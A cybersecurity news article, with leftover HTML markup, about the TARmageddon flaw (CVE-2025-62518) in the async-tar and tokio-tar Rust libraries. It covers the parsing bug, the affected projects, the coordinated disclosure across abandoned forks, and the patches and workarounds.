TARmageddon Vulnerability In Rust Library Let Attackers Replace Config Files And Execute Remote Codes
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
A severe vulnerability in the async-tar Rust library and its popular forks, including the widely used tokio-tar. Dubbed TARmageddon and tracked as CVE-2025-62518, the bug carries a CVSS score of 8.1, classifying it as high severity.<\/p>\n
It allows attackers to manipulate TAR archive parsing, potentially overwriting critical files like configuration scripts and triggering remote code execution (RCE) in affected systems.<\/p>\n
According to Edra, the flaw stems from a boundary-parsing error that mishandles nested TAR files, especially when PAX extended headers conflict with ustar headers.<\/p>\n
In vulnerable versions, the parser skips over actual file data based on a misleading zero-byte size in the ustar header, while ignoring the correct size in the PAX header. <\/p>\n
This desynchronization lets hidden entries from inner archives \u201csmuggle\u201d into the outer extraction, overwriting files in the target directory. <\/p>\n
Major projects like Astral\u2019s uv Python package manager, testcontainers for container testing, and wasmCloud are at risk, with the vulnerability\u2019s reach extending across millions of downloads due to tokio-tar\u2019s ubiquity in the Rust ecosystem<\/a>.<\/p>\n Disclosing and patching TARmageddon proved unusually complex because tokio-tar, the most downloaded fork with over 5 million crates.io pulls, appears abandoned, with no active maintainers, no SECURITY.md file, and scant contact info.<\/p>\n Edera coordinated a decentralized effort across the fork lineage: from the root async-tar to tokio-tar, then to their own krata-tokio-tar (now archived) and Astral\u2019s actively maintained astral-tokio-tar.<\/p>\n Researchers developed patches for the active forks, shared them under a 60-day embargo starting August 21, 2025, and reached out to downstream projects like binstalk and opa-wasm. <\/p>\n While Astral swiftly integrated the fix into uv and their fork, responses from others were mixed; some planned to drop the dependency, while uncontacted users remain exposed. <\/p>\n The original tokio-tar and async-tar lack patches, forcing users to migrate manually. Edera urges<\/a> immediate upgrades to patched versions or removal of the dependency, with astral-tokio-tar as the recommended alternative.<\/p>\n The patch enforces PAX header priority for size checks, validates header consistency, and adds boundary safeguards to prevent misalignment. <\/p>\n For those unable to switch quickly, workarounds include using the synchronous tar crate or runtime checks like manifest validation and sandboxed extractions.<\/p>\n Attackers could exploit TARmageddon in devious ways. In one scenario, a malicious PyPI package<\/a> uses an outer TAR with a benign pyproject.toml, but a nested inner TAR overwrites it with a rogue build backend, executing code during installation on developer or CI machines.<\/p>\n Container frameworks like testcontainers risk poisoning test environments by extracting tainted image layers, introducing backdoors. Security scanners might approve a \u201cclean\u201d outer archive, only for extraction to pull in unscanned malware, bypassing bill-of-materials checks.<\/p>\n This incident underscores Rust\u2019s limits: while it thwarts memory bugs, logic flaws like this persist in unmaintained code. <\/p>\n The 60-day timeline from discovery on August 21 to coordinated release on October 21 highlights the inefficiencies of fork-heavy ecosystems. <\/p>\n Edera notes their own products dodged impact through defense-in-depth, but the episode calls for better maintenance signals and proactive forking in open source. <\/p>\n Follow us on Google News<\/a>, LinkedIn<\/a>, and X<\/a> for daily cybersecurity updates. Contact us<\/a> to feature your stories.<\/strong><\/p>\n The post TARmageddon Vulnerability In Rust Library Let Attackers Replace Config Files And Execute Remote Codes<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nNavigating The Maze Of Abandoned Forks<\/strong><\/h2>\n